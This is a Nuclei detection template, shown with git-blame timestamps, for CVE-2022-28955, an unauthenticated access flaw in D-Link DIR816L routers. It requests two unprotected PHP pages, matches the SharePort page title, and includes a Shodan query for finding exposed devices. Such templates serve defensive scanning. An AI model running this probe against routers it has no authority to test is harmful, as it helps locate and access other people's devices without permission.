2022-08-14 14:56:22 +00:00
|
|
|
id: CVE-2022-28955
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: D-Link DIR816L - Access Control
|
|
|
|
author: arafatansari
|
2022-08-14 17:41:37 +00:00
|
|
|
severity: high
|
2022-08-14 14:56:22 +00:00
|
|
|
description: |
|
|
|
|
An access control issue in D-Link DIR816L_FW206b01 allows unauthenticated attackers to access folders folder_view.php and category_view.php.
|
|
|
|
reference:
|
|
|
|
- https://github.com/shijin0925/IOT/blob/master/DIR816/1.md
|
2022-08-14 15:02:02 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-28955
|
2022-08-14 17:41:37 +00:00
|
|
|
classification:
|
|
|
|
cve-id: CVE-2022-28955
|
2022-08-14 14:56:22 +00:00
|
|
|
metadata:
|
2022-08-14 17:41:37 +00:00
|
|
|
verified: true
|
2022-08-14 14:56:22 +00:00
|
|
|
shodan-query: http.html:"DIR-816L"
|
2022-08-14 17:41:37 +00:00
|
|
|
tags: cve,cve2022,dlink,exposure
|
2022-08-14 14:56:22 +00:00
|
|
|
|
|
|
|
requests:
|
2022-08-14 17:41:37 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/category_view.php"
|
|
|
|
- "{{BaseURL}}/folder_view.php"
|
2022-08-14 14:56:22 +00:00
|
|
|
|
2022-08-14 17:41:37 +00:00
|
|
|
stop-at-first-match: true
|
2022-08-14 14:56:22 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- '<title>SharePort Web Access</title>'
|
2022-08-14 17:41:37 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|